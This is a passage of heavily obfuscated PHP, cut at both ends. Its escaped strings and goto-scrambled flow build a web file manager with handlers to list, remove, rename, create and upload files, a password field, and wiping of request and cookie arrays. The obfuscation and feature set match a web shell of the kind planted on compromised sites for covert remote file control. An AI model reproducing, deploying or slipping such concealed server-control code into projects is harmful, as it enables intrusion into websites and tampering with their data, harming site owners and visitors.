"\x3c\x2f\142\165\x74\x74\157\156\76\xd\xa\x9\x9\40\15\xa\x9\x20\x3c\x2f\x64\x69\x76\x3e\15\xa\x20\40\40\40\74\x2f\x64\151\x76\x3e\15\xa\15\xa\40\x20\x3c\57\x64\x69\166\76\15\xa\x3c\57\144\x69\166\x3e\x9\15\xa\15\12\15\xa\x3c\x21\55\55\40\x4d\x6f\144\141\154\x20\116\145\167\x46\157\x6c\x64\145\x72\x20\55\55\76\xd\12\74\x64\151\x76\x20\x69\x64\75\42\x4e\145\167\106\157\154\x64\x65\x72\42\40\x63\154\x61\163\163\x3d\x22\x6d\157\144\141\154\x20\146\x61\x64\145\x22\x20\x72\x6f\154\145\x3d\42\x64\x69\x61\x6c\157\147\x22\x3e\xd\xa\x20\x20\x3c\x64\x69\166\x20\x63\x6c\141\x73\163\75\42\155\x6f\144\141\x6c\55\144\x69\x61\x6c\x6f\x67\x22\76\xd\12\xd\xa\40\40\x20\40\x3c\x21\x2d\55\40\115\x6f\x64\141\154\40\x63\157\156\x74\145\156\164\55\55\76\15\xa\40\x20\40\40\x3c\144\151\x76\40\x63\x6c\141\163\x73\75\x22\155\x6f\x64\141\x6c\x2d\x63\x6f\156\164\145\156\164\42\x3e\xd\12\x20\x20\x20\40\x20\40\74\144\151\x76\x20\x63\154\141\163\x73\x3d\x22\155\157\x64\x61\154\x2d\x68\145\141\144\x65\162\42\x3e\xd\12\x20\x20\40\x20\x20\40\x20\40\x3c\x62\x75\x74\x74\157\156\x20\164\x79\160\x65\x3d\x22\x62\x75\x74\x74\x6f\156\x22\x20\x63\154\141\163\163\x3d\x22\143\x6c\157\163\145\42\x20\144\x61\x74\x61\x2d\x64\x69\x73\155\x69\x73\x73\x3d\42\155\x6f\144\141\x6c\x22\x3e\46\164\151\x6d\145\x73\73\74\x2f\x62\x75\164\x74\157\x6e\76\xd\12\x20\x20\40\x20\x20\x20\x20\x20\74\x68\64\40\143\x6c\141\x73\163\x3d\x22\155\x6f\144\x61\154\x2d\x74\151\x74\154\x65\x22\x3e"; goto JLsYR; dcid2: echo "\74\x2f\x62\x75\164\x74\157\156\x3e\15\12\40\x20\40\x20\40\40\40\40\x3c\x62\x75\x74\x74\157\156\x20\x74\x79\160\x65\75\42\x62\x75\x74\x74\x6f\156\42\x20\x63\x6c\x61\x73\x73\x3d\x22\142\x74\x6e\40\x62\164\x6e\55\x64\145\x66\x61\165\x6c\x74\42\x20\144\x61\x74\x61\x2d\x64\x69\163\155\151\x73\x73\x3d\42\155\157\x64\x61\154\x22\x3e"; goto fUpQ3; kSQJF: unset($BsWPo); goto Lskde; dOwMB: echo "\342\x86\x92"; goto GiDH3; cvMv_: echo $W7YOX[18]; goto B1TqW; KtfQx: echo "\51\x20\156\x6f\x2d\162\x65\x70\x65\141\164\x20\154\145\146\164\x20\x63\x65\x6e\164\x65\162\x3b\40\x70\141\144\144\x69\156\147\72\x20\x35\160\x78\x20\x30\40\65\160\170\x20\x32\65\x70\170\x3b\x6d\x61\162\147\151\156\55\154\145\146\x74\72\x20\65\160\170\73\175\15\xa\56\x50\150\160\x49\143\x6f\x6e\x7b\142\141\143\153\147\x72\157\x75\x6e\x64\72\165\x72\x6c\50\x20"; goto kjo__; bFVSG: echo "\x20\74\x2f\150\x34\x3e\xd\xa\40\40\x20\x20\40\x20\74\57\144\151\166\76\15\12\40\40\40\x20\40\x20\x3c\x64\x69\166\40\143\154\141\163\163\75\42\x6d\157\144\x61\154\55\142\157\x64\x79\42\76\15\12\x9\x20\x20\x20\x20\x3c\x69\156\x70\165\x74\x20\151\x64\x3d\42\106\162\157\155\x46\157\x6c\x64\x65\x72\104\151\162\42\40\x74\171\x70\145\75\x22\x68\x69\144\x64\145\x6e\42\40\x3e\11\15\xa\x9\11\x3c\x69\156\x70\165\164\40\164\171\160\145\x3d\x22\x74\145\x78\164\42\x20\143\x6c\x61\x73\163\75\42\146\157\x72\155\x2d\143\x6f\x6e\x74\x72\157\x6c\42\x20\151\x64\x3d\x22\x54\x6f\106\x6f\x6c\144\x65\x72\x49\156\160\x75\x74\x22\76\15\12\40\x20\40\x20\40\x20\74\x2f\144\151\166\76\xd\xa\x20\x20\40\x20\x20\x3c\x64\x69\x76\x20\143\154\141\163\163\x3d\42\x6d\157\144\x61\154\55\x66\157\x6f\x74\145\162\42\x3e\15\12\11\x20\15\12\11\x20\40\40\x20\x3c\163\x70\141\x6e\40\x69\144\75\42\103\x6f\x70\171\114\141\142\145\x6c\163\x75\143\x63\x65\x73\163\x22\x20\x63\x6c\141\163\x73\75\42\154\141\x62\145\154\40\154\x61\142\x65\154\55\163\x75\x63\x63\x65\x73\163\x20\x70\165\154\x6c\x2d"; goto tudl5; AKt8a: echo "\x2e\x74\x72\145\145\166\151\x65\x77\x20\x75\154\x3a\x62\x65\146\157\x72\145\x20\173\x63\x6f\x6e\164\x65\x6e\164\x3a\42\42\73\x64\x69\x73\x70\154\x61\x79\x3a\x62\x6c\x6f\x63\x6b\x3b\167\x69\144\x74\x68\72\60\73\160\x6f\x73\151\x74\x69\x6f\156\72\x61\142\x73\x6f\154\x75\164\145\73\x74\x6f\x70\x3a\60\x3b\x72\151\x67\x68\164\72\x30\x3b\x62\157\162\x64\x65\162\x2d\x72\x69\x67\x68\164\x3a\61\x70\x78\40\x73\157\x6c\x69\x64\73\x62\x6f\x74\x74\157\155\72\x31\65\160\170\x3b\x7d\15\12\x2e\x74\162\145\145\166\x69\145\x77\x20\x75\154\40\x6c\151\72\142\145\x66\157\162\145\x20\x7b\x63\157\x6e\164\145\156\164\x3a\x22\x22\73\x64\151\163\x70\x6c\141\x79\72\x62\154\157\143\153\73\x77\151\144\x74\150\x3a\x31\x30\160\170\x3b\150\145\x69\147\x68\164\x3a\60\x3b\142\x6f\x72\144\x65\x72\x2d\x74\157\x70\x3a\x31\160\170\40\x73\157\154\x69\144\x3b\155\x61\x72\x67\151\156\x2d\164\x6f\160\72\x2d\x31\x70\x78\x3b\160\x6f\x73\x69\x74\151\157\x6e\x3a\141\142\x73\x6f\x6c\165\164\x65\x3b\164\x6f\160\72\61\x65\155\73\162\151\x67\x68\x74\x3a\60\x7d\xd\12"; goto UpUCs; Oo9UZ: goto Dllt3; goto pUbih; zPyNU: unset($_GET); goto Ck3sl; D8W8y: $W7YOX[37] = "\115\141\x78\40\x66\x69\x6c\x65\163\x69\172\145"; goto F_qKs; bkfPt: echo $W7YOX[36] . "\x20\x3a\x20\x3c\x63\x6f\144\145\x3e\x7b\40" . implode("\54", $r2sBB[0]) . "\40\175\x3c\57\143\157\x64\x65\76\40\74\142\162\x3e\40\15\12\11\40\40" . $W7YOX[37] . "\x20\x3a\40\74\143\157\x64\x65\x20\x69\144\x3d\42\x6d\141\x78\x46\151\x6c\145\123\x69\x7a\145\42\x3e" . $xiRE_ . "\x3c\x2f\x63\x6f\x64\x65\76"; goto UyPPq; iNob5: echo $fZ6Lt[10]; goto ZFriU; IxcBQ: Z8Vz5($_GET["\x52\145\155\x6f\x76\x65"]); goto OIiXf; btZ4a: echo $W7YOX[17]; goto nW1ax; A5N9m: if (!(isset($_GET["\156\145\x77\x66\x6f\x6c\144\x65\162"]) && kd9ya())) { goto xxr19; } goto KxkGT; hdWCx: if (!(isset($_GET["\x72\145\x6e\141\155\x65"]) && Kd9Ya())) { goto lTvvg; } goto vT_5q; SphgU: echo "\x27\51\73\xd\xa\11\11\x9\xd\xa\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\40\x20\40\44\50\x22\x23\106\x69\x6c\145\124\170\164\x22\51\x2e\x72\145\155\157\x76\145\101\x74\x74\x72\50\42\x64\151\163\141\x62\x6c\x65\144\x22\51\73\40\44\x28\42\43\x46\x69\x6c\145\x57\162\151\x74\145\x42\x74\x6e\42\51\56\x72\145\x6d\x6f\x76\145\x41\x74\164\x72\x28\x22\x64\151\x73\x61\142\154\x65\144\42\x29\x3b\xd\12\x9\x9\40\x20\40\40\40\40\40\15\12\11\11\11\x20\x20\40\144\145\154\145\164\x65\40\164\x78\164\104\x61\164\141\73\40\15\12\xd\xa\11\x9\11\x20\40\x20\x7d\51\x3b\xd\xa\x9\11\xd\12\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\40\175\73\xd\xa\11\11\x9\x20\xd\12\11\x9\x9\40\xd\12\x9\x9\x9\40\146\x75\156\x63\164\x69\x6f\x6e\40\x72\145\156\x61\x6d\145\101\x6e\x64\103\157\156\x74\145\156\164\x28\51\40\15\xa\11\11\11\x20\173\x20\xd\12\x9\x9\x9\40\40\x20\x24\50\x22\43\162\145\x6e\x61\155\145\111\156\x70\x75\x74\42\51\56\x61\x74\164\162\x28\42\x64\x69\163\141\x62\x6c\145\x64\x22\x2c\x20\42\x64\151\x73\141\142\x6c\x65\x64\x22\x29\73\xd\xa\x9\11\x9\x20\x20\x20\44\50\x27\x23\x52\145\x6e\x61\x6d\145\x4c\x61\x62\x65\x6c\163\165\143\x63\x65\163\163\47\51\56\x68\x74\155\x6c\50\x27"; goto xS_6G; y5XHf: oIsqU: goto oeref; BHS2t: wN_UY: goto FJW0H; NDh8c: unset($EoW3a); goto CfPwO; f8NX8: $W7YOX[6] = "\x53\151\x7a\145"; goto GR0xY; lgbUo: unset($fZ6Lt); goto hNF2A; J1E9G: if (!(isset($_GET["\x6c\151\163\164\x46\x6f\154\144\x65\162\x46\151\x6c\x65\x73"]) && KD9YA())) { goto LFtK_; } goto NWTK1; TUuQw: echo "\15\12\x20\x20\x20\x20\x20\x20\x3c\x2f\144\x69\166\76\15\xa\40\x20\40\40\x20\x3c\x64\151\x76\x20\x63\x6c\141\163\x73\x3d\x22\155\x6f\144\x61\154\x2d\x66\x6f\157\164\x65\162\x22\x3e\xd\xa\11\x20\15\xa\11\40\40\40\40\74\163\160\x61\156\40\x69\144\75\42\122\x65\x6d\x6f\x76\x65\x4c\141\142\x65\154\163\165\x63\143\145\163\x73\x22\40\143\154\x61\163\163\75\42\154\141\142\145\154\x20\154\141\142\x65\154\x2d\163\x75\143\x63\145\163\x73\40\x70\x75\154\154\55"; goto SFktQ; rIcjo: iV0db: goto R4wCj; xEOhV: unset($RYKLz); goto qnzY3; Trl2J: if (!(count($r2sBB[2]) != 0)) { goto Usylv; } goto D1G5B; I2HA3: die(Y82vL($s6erP)); goto GmytJ; AGzRt: if (!(isset($_GET["\122\x65\x6d\157\166\145"]) && Kd9YA())) { goto KDSZO; } goto IxcBQ; eisQi: echo "\x27\51\x3b\15\12\x9\11\x9\11\44\50\42\43\110\x72\x65\146\x54\x72\x65\145\x22\x29\56\150\164\x6d\154\x28\x27\x27\x29\x3b\xd\xa\x9\11\x9\xd\xa\11\x9\x9\x9\44\50\42\x23\122\145\163\x75\x6c\164\42\51\x2e\150\x74\155\x6c\x28\x27\74\x63\x65\156\x74\145\x72\76\74\x62\162\76\74\142\162\76\x3c\x73\x70\141\x6e\40\x63\154\141\x73\x73\75\42\114\157\x61\144\151\x6e\x67\x22\76\x3c\x2f\x73\160\141\156\x3e\74\142\162\76\x3c\142\x72\x3e"; goto X41fu; lRwph: die(Y82vl($s6erP)); goto P3Fwq; THE7l: unset($XVQVq); goto dMuQm; s4AwN: echo "\x22\40\x72\145\x6c\75\x22\151\x63\x6f\x6e\x22\40\164\171\160\145\x3d\42\151\155\x61\147\x65\57\170\x2d\151\143\157\x6e\x22\40\57\76\xd\12\11\11\74\164\x69\164\154\145\x3e"; goto IVLvt; fp3hQ: echo "\74\57\x63\145\x6e\x74\x65\x72\x3e\x27\x29\x3b\15\12\x9\40\40\40\40\x20\x20\40\x20\40\40\40\40\x24\x28\47\x23\x66\x69\154\145\x6e\141\x6d\145\x44\151\x72\x27\x29\x2e\x76\141\154\50\144\x69\x72\x29\x3b\x24\x28\x27\43\151\x6d\147\125\162\154\47\51\x2e\x68\164\155\154\50\x66\x69\x6c\145\x6e\x61\155\145\51\73\15\12\11\x9\11\11\44\x28\x27\x23\123\x68\x6f\x77\106\151\154\x65\x27\x29\x2e\155\157\144\141\x6c\50\x27\163\150\x6f\167\47\x29\73\x9\xd\12\11\x9\x9\x9\xd\xa\11\11\x9\151\146\50\x66\x69\x6c\x65\x6e\141\x6d\x65\x20\75\75\x27\144\x69\162\145\143\x74\x6f\x72\x79\x27\51\173\15\xa\x9\x9\x9\x9\15\xa\11\11\11\x9\x24\50\42\43\110\x72\x65\146\124\x72\145\145\42\51\56\x68\x74\x6d\154\x28\x27"; goto QgnNK; x5u5X: rG7h1: goto j6IZf; wrzSx: function KD9YA() { goto MAdra; vVCbN: e4419: goto i_iG9; l7mhi: cmOCu: goto jT0sa; zgDw4: goto cmOCu; goto vVCbN; MAdra: if (isset($_SERVER["\x48\124\124\120\137\130\x5f\122\105\121\125\x45\123\x54\x45\104\137\127\111\x54\110"]) && !empty($_SERVER["\x48\x54\124\x50\137\130\x5f\x52\x45\x51\x55\x45\x53\124\x45\x44\x5f\x57\111\x54\110"]) && strtolower($_SERVER["\x48\124\124\x50\x5f\130\x5f\122\x45\x51\x55\x45\123\x54\x45\x44\x5f\127\x49\124\x48"]) == "\170\x6d\x6c\150\x74\164\160\x72\145\x71\165\145\x73\164") { goto e4419; } goto L0U_l; L0U_l: return false; goto zgDw4; i_iG9: return true; goto l7mhi; jT0sa: } goto eg2Vv; GNb7q: foreach ($BsWPo as $telKg => $f4vjY) { goto DuHRo; lTQy8: goto TFMah; goto pMLRg; DuHRo: $nY7pD .= "\x3c\x74\162\x3e"; goto v0w0F; lDtfH: kJWTk: goto dkfVF; w58DR: TFMah: goto pzps3; v0w0F: if ($XMJqR == '') { goto gfFxv; } goto gfJZk; pzps3: $nY7pD .= "\x3c\x74\x64\x20\143\x6c\x61\163\163\75\42\x68\x69\144\x64\145\156\55\x78\x73\40\143\157\154\55\170\163\x2d\x33\x20\x63\x6f\154\55\x73\155\x2d\x33\x20\x63\157\154\55\x6d\x64\x2d\x33\x22\76" . e8vdi($f4vjY) . "\74\x2f\x74\144\76\x3c\57\x74\162\x3e"; goto lDtfH; pMLRg: gfFxv: goto soz_i; soz_i: $nY7pD .= "\x3c\x74\144\x20\x63\x6c\141\163\163\75\42\x63\157\154\55\155\x64\55\63\x22\x3e" . qbE8V($f4vjY) . "\x3c\x2f\x74\144\x3e\74\x74\x64\x20\143\x6c\141\163\163\x3d\42\150\151\144\144\145\156\x2d\170\163\x20\143\x6f\x6c\55\x6d\x64\x2d\62\42\76" . JCiOj($f4vjY) . "\74\x2f\164\x64\x3e\x3c\164\144\x20\143\154\141\x73\163\75\42\150\151\x64\144\x65\x6e\x2d\x78\163\40\143\x6f\154\x2d\x6d\144\55\62\42\x3e" . q6l_E($f4vjY) . "\x3c\57\x74\x64\x3e\74\x74\144\40\x63\154\x61\163\163\x3d\42\150\x69\x64\144\x65\x6e\x2d\x78\x73\40\x63\x6f\x6c\x2d\155\x64\x2d\x32\x22\76" . ekf2F($telKg, $f4vjY) . "\74\x2f\164\144\x3e"; goto w58DR; gfJZk: $nY7pD .= "\x3c\164\x64\40\143\154\141\x73\163\75\x22\143\x6f\154\x2d\170\163\55\61\62\x20\143\157\x6c\x2d\163\x6d\x2d\65\42\x3e" . QBE8v($f4vjY) . "\74\x2f\164\x64\76\74\x74\x64\x20\x63\154\141\x73\x73\75\x22\150\x69\x64\144\145\x6e\x2d\170\163\40\143\157\154\x2d\x78\163\x2d\x32\40\143\157\x6c\x2d\x73\155\x2d\62\40\x63\x6f\x6c\55\x6d\144\x2d\62\x22\x3e" . jCioJ($f4vjY) . "\74\57\x74\x64\76\x3c\164\x64\x20\x63\x6c\141\163\163\x3d\42\x68\151\144\x64\145\x6e\55\170\163\40\x63\x6f\154\55\x78\x73\x2d\x32\x20\x63\x6f\x6c\x2d\x73\x6d\55\62\40\143\157\154\55\x6d\x64\55\62\42\76\74\x73\x70\141\x6e\x20\143\x6c\141\x73\x73\x3d\42\154\141\142\145\154\40\154\x61\142\145\x6c\x2d\144\145\x66\141\x75\154\164\x22\76" . q6L_E($f4vjY) . "\x3c\57\x73\x70\x61\156\76\x3c\57\x74\x64\x3e"; goto lTQy8; dkfVF: } goto GbOhf; cpdAB: if ($zaydo) { goto fvb8T; } goto dCnq3; tSs42: $W7YOX[25] = "\x50\x61\x73\163\x77\157\x72\x64"; goto L273T; VWSi4: unset($_COOKIE); goto zPyNU; ibhBV: header("\x43\x6f\156\164\x65\x6e\x74\x2d\164\x79\x70\145\x3a\x20\x74\145\170\x74\57\150\x74\155\154\73\x20\x63\150\141\162\x73\145\x74\x3d" . $OQWkJ); goto JQMbb; u6kMM: echo "\x27\51\73\xd\12\44\x2e\x66\x6e\56\x65\170\164\145\156\144\50\173\xd\xa\x9\164\162\x65\x65\x76\151\145\x77\x3a\x9\x66\165\x6e\143\x74\151\157\x6e\50\51\40\173\xd\xa\11\x9\x72\145\x74\165\162\156\x20\x74\150\151\x73\x2e\145\141\143\150\50\146\x75\x6e\x63\x74\151\157\x6e\50\51\40\x7b\15\12\11\11\x9\166\141\162\x20\x74\x72\145\145\40\x3d\40\44\x28\x74\150\x69\163\x29\73\15\12\11\11\11\15\12\x9\11\x9\164\162\x65\145\x2e\x61\x64\x64\103\154\141\163\163\50\47\x74\162\x65\145\x76\151\x65\167\55\164\x72\145\145\47\51\x3b\15\12\x9\11\x9\x74\x72\x65\x65\56\x66\151\156\x64\50\x27\x6c\x69\47\51\56\x65\x61\x63\x68\x28\146\165\x6e\x63\164\x69\157\156\50\x29\40\173\15\xa\11\x9\x9\x9\166\x61\162\x20\x73\164\151\x63\x6b\40\x3d\40\x24\x28\164\150\x69\163\51\73\15\12\x9\11\11\175\x29\73\xd\12\11\x9\11\x74\162\145\x65\56\x66\x69\x6e\144\50\x27\154\151\47\51\x2e\150\141\163\x28\42\165\154\42\x29\56\x65\x61\143\150\50\146\x75\x6e\143\164\x69\157\156\x20\50\51\40\173\15\xa\11\11\x9\x9\166\x61\x72\x20\142\x72\x61\156\x63\x68\40\x3d\40\44\x28\x74\x68\x69\x73\x29\x3b\x20\11\x9\11\11\15\12\x9\11\x9\x9\142\x72\141\x6e\x63\150\x2e\x70\x72\145\x70\145\x6e\144\x28\x22\x3c\x69\40\143\154\141\163\163\x3d\47\164\162\145\145\55\151\156\144\151\x63\141\x74\157\162\x20\103\106\157\154\144\x65\162\x49\143\x6f\x6e\x27\76\74\x2f\151\x3e\x22\51\73\15\xa\x9\11\11\x9\x62\162\x61\156\143\150\x2e\x61\144\x64\x43\154\141\163\x73\x28\x27\164\x72\145\145\x2d\142\x72\141\156\x63\x68\x27\x29\x3b\15\xa\11\11\11\11\x62\162\x61\156\143\150\56\x6f\x6e\x28\47\143\x6c\151\x63\153\47\x2c\40\146\165\156\143\164\151\x6f\x6e\40\x28\x65\51\40\173\15\xa\x9\11\11\x9\11\151\146\x20\x28\x74\x68\x69\x73\40\x3d\75\x20\145\56\164\x61\x72\x67\145\164\x29\x20\173\15\xa\11\x9\x9\11\x9\x9\166\141\x72\x20\x69\143\x6f\x6e\40\x3d\x20\x24\x28\164\x68\151\x73\x29\x2e\143\x68\x69\x6c\144\x72\x65\x6e\x28\47\x69\72\x66\x69\162\x73\164\47\51\x3b\xd\12\x9\x9\x9\11\x9\x9\xd\12\x9\x9\11\11\x9\x9\x69\x63\157\156\56\x74\x6f\x67\x67\x6c\145\x43\154\x61\163\163\50\42\x4f\x46\x6f\x6c\144\x65\162\111\143\157\156\x22\51\x3b\15\xa\11\11\x9\x9\x9\x9\x24\50\x74\150\x69\x73\51\x2e\143\x68\x69\154\144\162\145\x6e\x28\x29\x2e\143\x68\x69\154\x64\x72\x65\156\x28\x29\56\x74\x6f\147\147\154\x65\50\51\x3b\xd\12\x9\x9\11\x9\11\175\15\xa\x9\11\x9\11\175\x29\xd\12\x9\x9\11\x9\x62\x72\x61\x6e\x63\x68\56\143\150\151\154\144\x72\145\156\50\51\x2e\143\150\x69\x6c\x64\x72\145\156\x28\x29\56\x74\157\x67\147\x6c\x65\50\51\x3b\11\xd\12\x9\x9\x9\11\x62\x72\141\x6e\x63\150\x2e\143\x68\x69\x6c\144\x72\145\x6e\50\47\x2e\164\162\x65\145\x2d\x69\x6e\x64\151\x63\141\164\157\162\x2c\x20\x62\165\x74\164\x6f\x6e\x2c\x20\141\47\x29\56\x63\x6c\151\x63\153\50\146\x75\x6e\x63\x74\x69\x6f\156\50\145\51\x20\173\15\12\x9\11\x9\x9\x9\x62\162\x61\x6e\143\x68\x2e\143\154\151\143\x6b\x28\51\73\15\xa\11\x9\x9\x9\x9\xd\xa\x9\x9\11\x9\x9\x65\56\160\162\145\x76\x65\x6e\x74\x44\x65\x66\141\x75\154\x74\50\x29\x3b\15\12\11\x9\x9\11\x7d\x29\x3b\xd\12\11\x9\x9\175\x29\73\15\xa\x9\x9\x7d\51\73\15\12\x9\x7d\xd\12\175\51\x3b\xd\12\15\xa\11\x9\15\12\x9\57\x2a\x2a\52\x2a\x2a\x2a\52\x2a\x2a\x2a\52\x2a\x2a\52\52\52\52\x2a\x2a\x2a\x2a\52\52\52\52\52\x2a\x2a\x2a\52\52\52\x2a\52\x2a\x2a\x2a\x2a\x2a\x2a\52\52\52\52\52\x2a\x2a\x2a\x2a\x2a\52\52\52\52\52\x2a\x2a\52\52\x2a\x2a\57\x9\15\xa\11\11\xd\xa\11\11\xd\xa\x20\40\40\40\44\x28\47\43\106\x69\x6c\x65\x55\x70\154\x6f\141\x64\106\x6f\162\x6d\47\x29\56\x6f\156\x28\47\x73\x75\142\x6d\151\x74\x27\54\x28\146\165\x6e\x63\164\x69\x6f\x6e\50\x65\x29\40\x7b\xd\xa\x9\x9\44\x28\x27\43\106\151\x6c\145\125\160\154\x6f\x61\144\x4c\x61\142\145\154\x73\165\143\x63\145\163\163\47\x29\56\150\164\155\154\x28\47"; goto gxQTQ; J7hVO: $s6erP = array("\x74\x61\142\x6c\x65" => $nY7pD, "\164\x6f\x74\141\x6c" => $Ru0H7, "\160\x61\147\x65" => $x5bhU, "\x64\x69\162" => $Lfznb, "\144\x69\x72\x48\164\x6d\154" => fIw9G(), "\x61\154\x65\162\x74" => $aBuS5); goto GeDwY; CfPwO: unset($aBuS5); goto BiLV_; xPTpT: echo "\40\x3c\151\x6e\160\165\x74\40\x6e\x61\x6d\145\x3d\x22\151\156\160\x75\x74\x46\151\x6c\x65\x55\x70\154\x6f\x61\x64\x5b\x5d\x22\40\x74\x79\x70\x65\75\x22\x66\x69\154\145\x22\40\155\165\154\x74\151\160\154\x65\40\x3e\xd\12\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\40\x20\x20\x3c\57\x73\x70\141\x6e\x3e\x20\xd\12\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\40\x20\40\40\x3c\x2f\x73\x70\x61\x6e\x3e\xd\xa\x20\x20\x20\40\x20\40\x20\40\40\40\x20\40\x20\40\x20\40\74\x69\x6e\160\x75\164\40\x74\171\160\x65\x3d\42\x74\145\x78\x74\x22\x20\x63\154\141\163\x73\75\42\146\157\x72\155\x2d\x63\x6f\156\164\x72\157\x6c\x22\x20\x72\145\141\144\x6f\x6e\x6c\171\40\x69\144\75\x22\151\x6e\160\x75\x74\106\151\154\145\x55\x70\154\x6f\141\x64\42\x3e\xd\12\40\x20\x20\40\x20\x20\x20\x20\40\x20\x20\40\x3c\x2f\144\151\x76\x3e\11\xd\12\11\x9\x9\xd\12\40\x20\40\40\40\x20\x3c\x2f\x64\x69\x76\76\15\xa\x20\x20\x20\40\x20\x3c\144\x69\166\40\x63\x6c\x61\163\163\75\42\x6d\x6f\x64\x61\154\x2d\146\157\157\x74\x65\x72\x22\x3e\15\xa\11\40\xd\12\x9\40\40\40\x20\x3c\163\160\141\156\x20\x69\x64\x3d\42\106\x69\x6c\145\125\160\x6c\157\141\144\x4c\141\142\145\154\163\165\x63\x63\145\x73\x73\x22\40\143\x6c\141\163\x73\75\42\x6c\x61\142\x65\x6c\40\154\x61\x62\145\x6c\x2d\x73\165\143\x63\x65\x73\x73\40\160\165\154\154\x2d"; goto juOCw; d6nH9: echo "\42\76\74\x2f\x73\x70\141\x6e\76\x20\15\xa\x9\x20\x20\40\x20\x3c\142\x75\x74\164\157\x6e\x20\x20\164\171\160\x65\x3d\42\x62\x75\164\164\157\156\42\40\x63\x6c\141\x73\x73\75\42\x62\x74\x6e\x20\142\164\x6e\55\x73\165\x63\143\x65\163\x73\x22\40\x6f\156\143\154\151\143\x6b\75\x22\x52\145\x6d\157\x76\x65\x41\156\x64\103\157\x6e\164\145\156\x74\x28\51\x22\x3e"; goto aerzO; sdF2O: echo "\51\x20\x6e\x6f\x2d\x72\145\x70\x65\x61\164\40\x6c\145\x66\x74\40\143\145\156\x74\145\162\73\x20\160\141\x64\x64\x69\156\147\72\x20\x35\160\170\40\60\x20\65\160\170\x20\62\65\160\x78\x3b\155\x61\x72\147\x69\156\x2d\154\x65\x66\164\72\40\65\160\x78\73\175\xd\xa\56\117\106\157\x6c\x64\145\x72\111\143\x6f\156\40\x7b\142\x61\143\153\147\162\157\165\x6e\144\x3a\x75\x72\x6c\x28"; goto wz5hX; GiP5s: echo "\342\x86\x90"; goto jI3uE; O7lsc: if (!(count($XVQVq) != 0)) { goto fi8cc; } goto kXlQQ; AUqa0: $fZ6Lt[10] = "\x64\x61\x74\141\72\151\x6d\141\x67\145\57\160\156\x67\73\142\141\x73\x65\x36\64\x2c\x69\126\102\117\x52\x77\60\113\107\x67\x6f\101\x41\x41\x41\x4e\123\125\150\105\125\147\101\x41\x41\x42\101\101\101\101\x41\x51\x43\x41\131\101\x41\x41\101\x66\70\57\71\150\101\x41\101\x41\60\60\154\105\x51\126\121\x34\152\144\x33\x50\120\x51\x72\103\121\102\x41\106\64\x42\x57\105\63\105\x46\x73\x76\x4d\153\62\x56\x6c\67\101\61\164\x35\x74\x4c\x45\123\167\163\x63\x79\167\x73\x4f\53\x39\x31\x49\x4c\130\163\142\112\120\x4b\126\x6a\x71\x44\x59\124\x59\x70\102\x43\112\151\130\x2b\x56\162\65\170\150\166\x70\154\170\67\x76\x39\151\132\147\x4d\101\x4f\60\153\x58\x6b\154\144\x4a\150\65\x54\x53\x39\117\x56\150\123\x55\144\112\60\143\x79\107\111\x59\x53\x4d\x35\102\x68\x41\x4b\127\156\x56\x43\x64\x53\x62\x59\170\116\115\70\150\x78\x6a\110\114\x55\103\x6b\151\65\x6d\x4e\x6d\172\x71\x6b\x64\x79\123\x6e\x4c\143\103\112\113\70\150\150\117\x78\x4a\114\x77\x65\167\x37\162\x72\x67\x51\110\114\70\127\x4b\x2b\x71\x71\x69\x64\x70\104\x32\104\x53\x43\x71\123\125\160\147\102\113\x4d\170\x73\x38\x44\x43\x38\x6c\156\x62\172\63\x2f\x56\141\147\166\x6d\x4a\106\70\x6c\x7a\x2f\156\105\166\x61\123\172\x6f\x56\x52\x56\x45\x42\62\x48\121\x43\x7a\x6a\153\130\131\170\171\122\x6e\x41\116\131\x41\x35\150\x34\67\x2f\163\x41\x4e\155\x38\x68\x54\142\154\104\106\x74\x38\x67\x43\x30\x6d\172\x6a\64\107\146\x35\167\x59\x63\x30\64\x4b\152\x41\165\132\x6d\171\x51\101\101\101\x41\x42\x4a\122\125\x35\105\x72\x6b\x4a\147\x67\147\x3d\x3d"; goto aUBgn; S9pur: $W7YOX[40] = "\x43\x6f\160\x79\40\164\157"; goto XWrNb; uNzCl: $TdtK7 = isset($_GET["\x70\145\162\x70\x61\147\145"]) ? (int) $_GET["\x70\x65\162\160\141\147\145"] : 10; goto ajob2; fKjGT: echo $fZ6Lt[11]; goto DL3AH; Ck3sl: unset($_POST); goto OJg2b; Ebm6F: j6v0A: goto fjl_P; lOsm1: echo $W7YOX[14]; goto jSsED; X41fu: echo $W7YOX[35]; goto fp3hQ; Bn3hS: unset($XVQVq); goto t9RTP; mIsyL: $nY7pD .= "\74\164\x64\x20\143\157\x6c\163\160\141\156\x3d\x22\x35\x22\40\x63\154\141\163\163\75\42\143\157\154\x2d\170\x73\x2d\x31\x32\40\x63\157\x6c\x2d\163\155\55\x31\x32\x20\143\157\x6c\55\155\144\x2d\x31\62\x22\76"; goto fcKMt; PHKQY: echo $W7YOX[10]; goto jLvhj; TU4Yq: function klVfZ($g7ThV) { goto Yfff5; dMBq_: A373B: goto X18JC; gU1c8: vFbab: goto Xet4P; PKQbB: foreach ($dHI3K as $uloE6) { goto ESmCW; WgH5H: if (!is_dir($g7ThV . "\57" . $uloE6)) { goto WCb7i; } goto i_Klo; ESmCW: if (!($uloE6 != "\56" && $uloE6 != "\56\56" && (in_array(q6l_e($uloE6), $r2sBB[0]) || count($r2sBB[0]) == 0))) { goto nkrRe; } goto V74_k; MpXba: nkrRe: goto y_ZKe; i_Klo: klvfz($g7ThV . "\57" . $uloE6); goto VzOVf; V74_k: echo "\x3c\154\151\76\74\x61\x20\x68\x72\145\146\x3d\42" . $g7ThV . "\x2f" . $uloE6 . "\x22\x3e" . $uloE6; goto WgH5H; VzOVf: WCb7i: goto gZu0S; y_ZKe: qdRzX: goto lsiPW; gZu0S: echo "\x3c\x2f\141\x3e\74\57\154\151\x3e"; goto MpXba; lsiPW: } goto hjnex; Ed_F3: return; goto gU1c8; Yfff5: global $r2sBB; goto iTvij; X18JC: echo "\74\x2f\x75\x6c\76"; goto FOK1O; iTvij: if (!(is_file($g7ThV) === true)) { goto vFbab; } goto Ed_F3; GM3JI: echo "\40\74\165\x6c\76"; goto jQ0o0; jQ0o0: if (!(is_array($dHI3K) || is_object($dHI3K))) { goto A373B; } goto PKQbB; hjnex: bNvxO: goto dMBq_; Xet4P: $dHI3K = scandir($g7ThV); goto GM3JI; FOK1O: } goto 